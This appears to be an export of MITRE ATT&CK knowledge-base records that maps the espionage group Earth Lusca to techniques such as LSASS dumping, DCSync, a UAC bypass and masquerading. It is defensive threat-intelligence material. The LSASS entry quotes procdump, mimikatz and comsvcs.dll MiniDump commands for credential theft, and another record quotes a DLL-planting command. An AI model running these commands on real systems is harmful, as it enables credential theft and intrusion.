x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) used Python scripts for port scanning or building reverse shells.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--6e6f9a76-23b6-4474-abc1-3d477284c220
revoked : False
technique : Python
technique_description : Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the <code>python.exe</code> interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.

Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
technique_id : T1059.006
matrix : mitre-attack
platform : ['Linux', 'Windows', 'macOS']
data_sources : ['Process: Process Creation', 'Command: Command Execution']
permissions_required : ['Administrator', 'SYSTEM', 'root']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used WinRAR to compress stolen files into an archive prior to exfiltration.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--d0a3d891-2555-45eb-8aaf-99b86372607b
revoked : False
technique : Archive via Utility
technique_description : Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport.

Adversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as <code>tar</code> on Linux and macOS or <code>zip</code> on Windows systems. 

On Windows, <code>diantz</code> or <code> makecab</code> may be used to package collected files into a cabinet (.cab) file. <code>diantz</code> may also be used to download and compress files from remote locations (i.e. [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002)).(Citation: diantz.exe_lolbas) <code>xcopy</code> on Windows can copy files and directories with a variety of options. Additionally, adversaries may use [certutil](https://attack.mitre.org/software/S0160) to Base64 encode collected data before exfiltration. 

Adversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.(Citation: 7zip Homepage)(Citation: WinRAR Homepage)(Citation: WinZip Homepage)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='collection')]
technique_id : T1560.001
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Process: Process Creation', 'Command: Command Execution', 'File: File Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used ProcDump to obtain the hashes of credentials by dumping the memory of the LSASS process.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--9d82c2c5-7d98-40dd-9171-1d605f259064
revoked : False
technique : LSASS Memory
technique_description : Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).

As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.

For example, on the target host use procdump:

* <code>procdump -ma lsass.exe lsass_dump</code>

Locally, mimikatz can be run using:

* <code>sekurlsa::Minidump lsassdump.dmp</code>
* <code>sekurlsa::logonPasswords</code>

Built-in Windows tools such as comsvcs.dll can also be used:

* <code>rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID  lsass.dmp full</code>(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)


Windows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)

The following SSPs can be used to access credentials:

* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
* CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)

tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='credential-access')]
technique_id : T1003.001
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Process: Process Access', 'Windows Registry: Windows Registry Key Modification', 'Process: Process Creation', 'Process: OS API Execution', 'Logon Session: Logon Session Creation', 'Command: Command Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used a <code>DCSync</code> command with [Mimikatz](https://attack.mitre.org/software/S0002) to retrieve credentials from an exploited controller.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--14c209b9-cef8-4acf-8deb-57c03beaa64f
revoked : False
technique : DCSync
technique_description : Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.

Members of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data(Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003)(Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098).(Citation: InsiderThreat ChangeNTLM July 2017)

DCSync functionality has been included in the "lsadump" module in [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.(Citation: Microsoft NRPC Dec 2017)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='credential-access')]
technique_id : T1003.006
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Active Directory: Active Directory Object Access', 'Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow']
permissions_required : ['Administrator']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used the Fodhelper UAC bypass technique to gain elevated privileges.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--a57c1d9d-0d2f-4206-a53f-d31ab7c53c17
revoked : False
technique : Bypass User Account Control
technique_description : Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)

If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box.(Citation: TechNet Inside UAC)(Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)

Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:

* <code>eventvwr.exe</code> can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)

Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1548.002
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Windows Registry: Windows Registry Key Modification', 'Command: Command Execution', 'Process: Process Creation', 'Process: Process Metadata']
permissions_required : ['Administrator', 'User']
effective_permissions : ['Administrator']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) used the command `move [file path] c:\windows\system32\spool\prtprocs\x64\spool.dll` to move and register a malicious DLL name as a Windows print processor, which eventually was loaded by the Print Spooler service.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--4feaa82b-a356-4412-be2b-daa6ea6df82c
revoked : False
technique : Match Legitimate Name or Location
technique_description : Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.

Adversaries may also use the same icon of the file they are trying to mimic.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1036.005
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Containers']
data_sources : ['File: File Metadata', 'Image: Image Metadata', 'Process: Process Metadata', 'Process: Process Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) used the command <code>powershell “Get-EventLog -LogName security -Newest 500 | where {$_.EventID -eq 4624} | format-list -
property * | findstr “Address””</code> to find the network information of successfully logged-in accounts to discovery addresses of other machines. [Earth Lusca](https://attack.mitre.org/groups/G1006) has also used multiple scanning tools to discover other machines within the same compromised network.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--2bb7ed69-8f59-47f3-8d86-f1c1202c7629
revoked : False
technique : Remote System Discovery
technique_description : Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as  [Ping](https://attack.mitre.org/software/S0097) or <code>net view</code> using [Net](https://attack.mitre.org/software/S0039).

Adversaries may also analyze data from local host files (ex: <code>C:\Windows\System32\Drivers\etc\hosts</code> or <code>/etc/hosts</code>) or other passive means (such as local [Arp](https://attack.mitre.org/software/S0099) cache entries) in order to discover the presence of remote systems in an environment.

Adversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands on network devices to gather detailed information about systems within a network (e.g. <code>show cdp neighbors</code>, <code>show arp</code>).(Citation: US-CERT-TA18-106A)(Citation: CISA AR21-126A FIVEHANDS May 2021)  

tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')]
technique_id : T1018
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Network']
data_sources : ['Command: Command Execution', 'File: File Access', 'Network Traffic: Network Connection Creation', 'Process: Process Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
